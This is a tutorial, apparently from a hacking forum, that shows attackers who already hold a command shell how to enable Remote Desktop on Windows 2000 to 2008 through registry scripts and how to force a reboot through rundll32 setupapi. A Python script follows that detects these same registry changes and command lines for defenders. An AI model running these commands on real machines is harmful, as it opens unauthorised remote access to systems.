Many people who obtain cmd access don't know what to do with it next; the usual uses are adding accounts, opening 3389, escalating privileges, and so on.
Today I'll cover opening 3389 from cmd. It is very simple. I'll start with Server 2008, because 2008 servers are still very widely used in the industry. There are many tutorials online, some of which require a reboot; here is how to do it from cmd.
Windows 2008
First, the target machine does not have the 3389 remote service enabled. Enter the following commands:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
Then run regedit /s 3389.reg in cmd to import the file.
Windows XP
First XP: 3389 is not enabled. Enter the following command:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Windows 2003
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
regedit /s 3389.reg
Windows 2000
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Rebooting the target
@ECHO OFF
cd /d %temp%
rem Write a minimal .inf and hand it to setupapi; the trailing 1 is the reboot flag
echo [version] > {out}.inf
set inf=InstallHinfSection DefaultInstall
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%\{out}.inf
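Every variant above touches the same small set of registry values (fDenyTSConnections, TSEnabled, the two PortNumber values, and the TermService/TermDD Start values), written either through regedit /s with a generated .reg file or through reg add, and the reboot trick leaves a rundll32 setupapi,InstallHinfSection command line behind. The Python script below is an added example written for this page, not code from the original post: it parses .reg text and process command lines (the form Sysmon event 1 or Security event 4688 records) and flags exactly those changes, so a defender can alert when Remote Desktop is switched on from a shell. The sample .reg text and command lines are constructed here, and the tag names, function names and Finding type are my own.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple, Union

# Registry values (key relative to HKLM, value name) that switch Remote Desktop on
# or move its listener port. These are the values the snippets above write.
TS = r"system\currentcontrolset\control\terminal server"
WATCHED: Dict[Tuple[str, str], Tuple[str, Callable[[object], bool]]] = {
    (TS, "fdenytsconnections"): ("rdp-enabled", lambda v: v == 0),
    (TS, "tsenabled"): ("rdp-enabled", lambda v: v == 1),
    (TS + r"\winstations\rdp-tcp", "portnumber"): ("rdp-port-set", lambda v: True),
    (TS + r"\wds\rdpwd\tds\tcp", "portnumber"): ("rdp-port-set", lambda v: True),
    (r"system\currentcontrolset\services\termservice", "start"): ("rdp-service-autostart", lambda v: v == 2),
    (r"system\currentcontrolset\services\termdd", "start"): ("rdp-service-autostart", lambda v: v == 2),
}


@dataclass
class Finding:
    source: str              # "reg-file" or "cmdline"
    key: str                 # normalised key (relative to HKLM, lower-case, backslashes)
    name: str                # registry value name as written
    value: Union[int, str]   # parsed value, or the raw command line for whole-line matches
    tag: str                 # rdp-enabled / rdp-port-set / rdp-service-autostart / reg-import / reboot-trick


def normalize_key(key: str) -> str:
    """Lower-case, use backslashes and drop the HKLM hive so the .reg spelling
    and the reg add spelling compare equal (forward slashes are tolerated)."""
    k = key.strip().strip("[]").replace("/", "\\").lower()
    for prefix in ("hkey_local_machine\\", "hklm\\"):
        if k.startswith(prefix):
            k = k[len(prefix):]
    return k


def parse_number(text: str) -> Union[int, str]:
    """Parse a .reg dword (dword:00000d3d) or a reg add /d operand (0, 0x0d3d, 3389).
    Anything else is returned as a string with surrounding quotes removed."""
    t = text.strip()
    if t.lower().startswith("dword:"):
        return int(t[6:], 16)
    if t.lower().startswith("0x"):
        return int(t, 16)
    if t.isdigit():
        return int(t, 10)
    return t.strip('"')


def classify(source: str, key: str, name: str, value: Union[int, str]) -> Optional[Finding]:
    """Return a Finding if (key, name, value) is one of the watched RDP changes."""
    entry = WATCHED.get((normalize_key(key), name.lower()))
    if entry is None:
        return None
    tag, matches = entry
    return Finding(source, normalize_key(key), name, value, tag) if matches(value) else None


def parse_reg_text(text: str) -> List[Tuple[str, str, str]]:
    """Yield (key, value-name, raw-value) triples from .reg file text."""
    triples, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and line.startswith('"') and '"=' in line:
            name, raw = line[1:].split('"=', 1)
            triples.append((current, name, raw))
    return triples


def audit_reg_text(text: str) -> List[Finding]:
    found = [classify("reg-file", k, n, parse_number(raw)) for k, n, raw in parse_reg_text(text)]
    return [f for f in found if f]


REG_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+("?)(.+?)\1\s+(.*)', re.I)


def _opt(flag: str, tail: str) -> Optional[str]:
    m = re.search(r"/%s\s+(\S+)" % flag, tail, re.I)
    return m.group(1) if m else None


def audit_command_line(cmdline: str) -> List[Finding]:
    """Classify one process command line as Sysmon event 1 / Security 4688 would record it."""
    out: List[Finding] = []
    m = REG_ADD.search(cmdline)
    if m:
        key, tail = m.group(2), m.group(3)
        name, data = _opt("v", tail), _opt("d", tail)
        if name and data is not None:
            f = classify("cmdline", key, name, parse_number(data))
            if f:
                out.append(f)
    if re.search(r"\bregedit(?:\.exe)?\s+/s\b", cmdline, re.I):      # silent .reg import
        out.append(Finding("cmdline", "", "", cmdline, "reg-import"))
    if re.search(r"\brundll32(?:\.exe)?\s+setupapi.*installhinfsection", cmdline, re.I):
        out.append(Finding("cmdline", "", "", cmdline, "reboot-trick"))  # setupapi reboot trick
    return out


# Constructed sample input: the Server 2008 .reg content as regedit would read it.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d3d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"""

# Constructed sample command lines; the last one is a benign reg add for contrast.
SAMPLE_CMDLINES = [
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"regedit /s C:\Windows\Temp\3389.reg",
    r"rundll32 setupapi,InstallHinfSection DefaultInstall 1 C:\Windows\Temp\out.inf",
    r'reg add "HKLM\SOFTWARE\Contoso\App" /v Installed /t REG_DWORD /d 1 /f',
]


def audit_all(cmdlines: List[str], reg_text: str) -> List[Finding]:
    findings = audit_reg_text(reg_text)
    for c in cmdlines:
        findings.extend(audit_command_line(c))
    return findings


if __name__ == "__main__":
    for f in audit_all(SAMPLE_CMDLINES, SAMPLE_REG):
        print(f"{f.tag:22} {f.source:9} {f.key} {f.name} {f.value}")
```

The PortNumber findings report the port in decimal (dword:00000d3d is 3389), so a value other than 3389 stands out as a moved listener. In a real pipeline the .reg parser would run over files dropped in temp directories and the command-line classifier over process-creation events; both share the same WATCHED table, so adding a value there covers both sources at once.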
Others will be added after further testing!